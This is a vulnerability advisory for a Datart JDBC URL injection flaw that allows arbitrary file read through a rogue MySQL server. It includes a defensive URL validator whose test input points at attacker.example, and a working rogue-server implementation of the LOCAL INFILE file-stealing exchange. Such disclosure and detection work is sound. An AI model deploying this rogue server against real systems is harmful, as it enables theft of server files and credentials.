Datart JDBC Connection URL Injection Vulnerability Allowing Arbitrary Code Execution
Vulnerability
A vulnerability rated as allowing arbitrary code execution has been identified in Datart version 1.0.0-rc.3. The issue lies in the data source configuration module, which does not validate the JDBC connection URL supplied by the user. A remote attacker who holds the privilege to configure data sources can therefore append arbitrary connection properties to the URL and point it at a host of their choosing. By directing the connection to a rogue MySQL server and setting the 'allowLoadLocalInfile' property to true, the attacker makes the MySQL JDBC driver honour the server's 'LOAD DATA LOCAL INFILE' request: the driver reads the file the rogue server names from the Datart server's file system and uploads its contents to the attacker. Any file the Datart process can read is exposed this way, which can lead to compromise of the server.
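One way to enforce the validation the data source module lacks, as an added example written for this page rather than Datart's own code: parse the user-supplied JDBC URL, reject any host outside an operator-maintained allow-list, and reject client-side Connector/J properties that let a hostile server act on the client. The deny-list, the allow-list contents and the function names are assumptions; Python is used so the check runs stand-alone, while in Datart the same logic would sit in the Java code that accepts the data source configuration.

```python
import re
from urllib.parse import parse_qs, unquote

# Connector/J properties that give the *server* leverage over the *client* process.
# Assumption: an editor-chosen deny-list; extend it for any other driver you accept.
CLIENT_SIDE_RISKY = {
    "allowloadlocalinfile",        # honour LOCAL INFILE requests -> arbitrary file read
    "allowloadlocalinfileinpath",  # same, limited to a directory, still server-steered
    "allowurlinlocalinfile",       # the requested "file" may be a URL -> SSRF from the client
    "autodeserialize",             # BLOB columns deserialised as Java objects -> gadget chains
}

# jdbc:mysql://, jdbc:mysql+srv://, jdbc:mysql:loadbalance://, jdbc:mysql:replication://
JDBC_MYSQL = re.compile(
    r"^jdbc:mysql(?:\+srv)?(?::(?:loadbalance|replication))?://([^/?#]*)([^?#]*)(?:\?(.*))?$",
    re.IGNORECASE,
)


def hosts_in_authority(authority: str) -> list:
    """Extract host names from 'user:pw@h1:3306,h2' (comma-separated, optional credentials)."""
    hosts = []
    for hostport in authority.rsplit("@", 1)[-1].split(","):
        hostport = hostport.strip()
        if hostport.startswith("["):                      # bracketed IPv6 literal, e.g. [::1]:3306
            hosts.append(hostport[1:hostport.index("]")])
        else:
            hosts.append(hostport.rsplit(":", 1)[0])
    return hosts


def check_jdbc_url(url: str, allowed_hosts: set) -> list:
    """Return the reasons to reject `url`; an empty list means it passed."""
    findings = []
    m = JDBC_MYSQL.match(url.strip())
    if not m:
        return ["not a plain jdbc:mysql URL"]
    authority, _path, query = m.groups()
    if "(" in authority:
        # address=(host=..)(port=..)(key=..) syntax can carry properties; reject it outright
        return ["key/value host syntax is not accepted"]
    for host in hosts_in_authority(unquote(authority)):
        if host.lower() not in allowed_hosts:
            findings.append(f"host not in allow-list: {host}")
    # Compare case-insensitively and ignore the value: the application, not the user,
    # must own these properties, so their mere presence is a finding.
    for key in parse_qs(query or "", keep_blank_values=True):
        if key.lower() in CLIENT_SIDE_RISKY:
            findings.append(f"client-side property must not be user-controlled: {key}")
    return findings


def build_trusted_url(host: str, port: int, database: str, allowed_hosts: set) -> str:
    """Hardened alternative: build the URL from validated fields and pin the risky properties."""
    if host.lower() not in allowed_hosts:
        raise ValueError(f"host {host!r} not allowed")
    if not re.fullmatch(r"[A-Za-z0-9_.-]+", host) or not re.fullmatch(r"[A-Za-z0-9_$]+", database):
        raise ValueError("host or database contains characters that could alter the URL")
    return (f"jdbc:mysql://{host}:{int(port)}/{database}"
            "?allowLoadLocalInfile=false&allowUrlInLocalInfile=false&autoDeserialize=false")


if __name__ == "__main__":
    allowed = {"db.internal"}                              # constructed allow-list
    # Constructed inputs: an attacker-style URL as in the advisory, then a benign one.
    print(check_jdbc_url("jdbc:mysql://attacker.example:3306/test?allowLoadLocalInfile=true", allowed))
    print(check_jdbc_url("jdbc:mysql://db.internal:3306/datart?useSSL=true", allowed))
    print(build_trusted_url("db.internal", 3306, "datart", allowed))
```

The deny-list approach only covers the properties listed; the safer design is the second function, which never accepts a raw URL from the user and instead builds one from a validated host, port and database name while pinning the dangerous properties to false. Note that properties can also reach the driver through a separate Properties object, so any such path in the application needs the same treatment.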
Impact
Exploitation allows an authenticated attacker with data source configuration privileges to read arbitrary files from the Datart server, such as configuration files, credentials or source code. The advisory rates the issue as arbitrary code execution because the disclosed material can be used in follow-on attacks against the server.
Reproduction
To reproduce this vulnerability, an authenticated user with privileges to configure data sources sends a POST request to the Datart server's data provider test API. The request carries a JDBC connection URL that points to a MySQL server controlled by the attacker, with the 'allowLoadLocalInfile' parameter set to true. When Datart tests the connection, the rogue server completes the handshake, accepts any credentials, and answers the driver's first query with a 'LOAD DATA LOCAL INFILE' request naming a file on the Datart server; the driver reads that file and sends its contents to the rogue server. Repeating the request with different file names reads arbitrary files the Datart process has access to.
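The exchange the reproduction relies on, as an added example that is not part of the advisory or of Datart: a minimal rogue MySQL server that answers the driver's first query with a LOCAL INFILE request, together with a stand-in client that behaves like a driver started with allowLoadLocalInfile=true, so the whole exchange runs offline on a loopback port. The packet layouts are the standard MySQL client/server protocol (HandshakeV10, OK, COM_QUERY, and the 0xFB LOCAL INFILE request); the target path, the fake file system and the function names are assumptions. Point a real driver at the server only in a lab you own.

```python
import socket
import threading

CLIENT_LOCAL_FILES, CLIENT_PROTOCOL_41 = 0x80, 0x200
CLIENT_SECURE_CONNECTION, CLIENT_PLUGIN_AUTH = 0x8000, 0x80000
SERVER_CAPS = CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH
# OK_Packet: header 0x00, affected rows 0, last insert id 0, SERVER_STATUS_AUTOCOMMIT, 0 warnings
OK_PACKET = b"\x00\x00\x00\x02\x00\x00\x00"


def packet(payload: bytes, seq: int) -> bytes:
    """Frame a payload: 3-byte little-endian length, 1-byte sequence id, payload."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def read_packet(sock):
    """Return (sequence id, payload) of the next packet on the socket."""
    header = recv_exact(sock, 4)
    return header[3], recv_exact(sock, int.from_bytes(header[:3], "little"))


def handshake_v10(version: bytes = b"5.7.31", salt: bytes = b"A" * 20) -> bytes:
    """Server greeting. The only flag the attack depends on is CLIENT_LOCAL_FILES."""
    return (b"\x0a" + version + b"\x00" + (1).to_bytes(4, "little")              # protocol, version, conn id
            + salt[:8] + b"\x00"                                                  # auth data part 1, filler
            + (SERVER_CAPS & 0xFFFF).to_bytes(2, "little") + b"\x21"              # caps (low), utf8_general_ci
            + (2).to_bytes(2, "little") + (SERVER_CAPS >> 16).to_bytes(2, "little")  # status, caps (high)
            + bytes([21]) + b"\x00" * 10 + salt[8:20] + b"\x00"                   # auth len, reserved, part 2
            + b"mysql_native_password\x00")


def greeting_caps(payload: bytes) -> int:
    """Parse the capability flags out of a HandshakeV10 payload, as a driver does."""
    i = payload.index(b"\x00", 1) + 1 + 4 + 8 + 1       # skip version, connection id, salt, filler
    return int.from_bytes(payload[i:i + 2], "little") | (int.from_bytes(payload[i + 5:i + 7], "little") << 16)


def local_infile_request(path: str) -> bytes:
    """The malicious reply to COM_QUERY: 0xFB followed by the file the client should upload."""
    return b"\xfb" + path.encode()


def serve_once(listener: socket.socket, path: str) -> bytes:
    """Rogue server: accept one driver connection and return whatever file content it uploads."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(packet(handshake_v10(), 0))
        read_packet(conn)                                # HandshakeResponse41; credentials are ignored
        conn.sendall(packet(OK_PACKET, 2))               # every login "succeeds"
        seq, _query = read_packet(conn)                  # the driver's first COM_QUERY (seq 0)
        conn.sendall(packet(local_infile_request(path), seq + 1))
        data = b""
        while True:                                      # file arrives in packets; an empty one ends it
            seq, chunk = read_packet(conn)
            if not chunk:
                break
            data += chunk
        conn.sendall(packet(OK_PACKET, seq + 1))
    return data


def driver_with_local_infile(host: str, port: int, fake_fs: dict) -> str:
    """Stand-in for a JDBC driver with allowLoadLocalInfile=true (constructed, not Connector/J).
    Returns the path the server asked for; content comes from `fake_fs` instead of the disk."""
    with socket.create_connection((host, port)) as s:
        seq, greeting = read_packet(s)
        assert greeting_caps(greeting) & CLIENT_LOCAL_FILES
        client_caps = CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_LOCAL_FILES
        # HandshakeResponse41: caps, max packet, charset, 23 reserved bytes, user, empty auth response
        s.sendall(packet(client_caps.to_bytes(4, "little") + (1 << 24).to_bytes(4, "little")
                         + b"\x21" + b"\x00" * 23 + b"datart\x00" + b"\x00", seq + 1))
        read_packet(s)                                   # OK
        s.sendall(packet(b"\x03SELECT 1", 0))            # COM_QUERY; a new command restarts seq at 0
        seq, resp = read_packet(s)
        if resp[:1] != b"\xfb":
            return ""
        path = resp[1:].decode()
        content = fake_fs.get(path, b"")                 # a real driver opens the file here
        if content:
            seq += 1
            s.sendall(packet(content, seq))
        s.sendall(packet(b"", seq + 1))                  # empty packet marks the end of the upload
        read_packet(s)                                   # final OK
        return path


def run_demo(path: str = "/etc/hostname", fake_fs: dict = None):
    """Run server and client on a loopback port; return (path requested, bytes exfiltrated)."""
    fake_fs = fake_fs if fake_fs is not None else {"/etc/hostname": b"datart-server\n"}  # constructed
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    result = {}
    t = threading.Thread(target=lambda: result.update(data=serve_once(listener, path)))
    t.start()
    requested = driver_with_local_infile("127.0.0.1", listener.getsockname()[1], fake_fs)
    t.join()
    listener.close()
    return requested, result["data"]


if __name__ == "__main__":
    print(run_demo())
```

The server never checks a password and never parses the query: it responds to whatever the driver sends first with the 0xFB request, which is why a mere "test connection" action is enough to trigger the upload. The detection angle follows from the same exchange: a MySQL client process sending file-sized uploads to an external host immediately after connecting, or a JDBC URL containing allowLoadLocalInfile pointing outside the database network, is the indicator to alert on.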
